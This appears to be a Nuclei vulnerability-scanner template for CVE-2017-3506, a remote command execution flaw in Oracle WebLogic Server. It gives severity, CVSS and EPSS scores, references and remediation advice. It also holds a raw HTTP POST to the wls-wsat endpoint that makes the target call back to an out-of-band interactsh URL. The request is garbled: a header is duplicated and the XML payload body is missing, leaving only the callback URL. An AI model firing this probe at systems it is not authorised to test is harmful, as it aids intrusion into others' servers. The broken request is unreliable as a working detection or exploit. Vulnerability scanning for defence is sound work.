id: CVE-2017-3506 info: name: Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution author: pdteam severity: high description: The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. impact: | Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system. remediation: | Apply the necessary patches or updates provided by Oracle to fix this vulnerability. reference: - https://hackerone.com/reports/810778 - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html - http://www.securitytracker.com/id/1038296 - https://github.com/CVEDB/top classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 7.4 cve-id: CVE-2017-3506 epss-score: 0.96935 epss-percentile: 0.99702 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle product: weblogic_server tags: cve,cve2017,rce,oast,hackerone,weblogic,oracle http: - raw: - | POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, Content-Type: text/xml;charset=UTF-8 http://{{interactsh-url}} matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" # digest: 4a0a004730450221009af3dc7a023956f425c329f162e8bf603416c546b1876ce01e72ac09119bc24202205406c351433b267b3312803f8f1cd75b9707dfc851008977f33e4db88e70404d:922c64590222798bb761d5b6d8e72950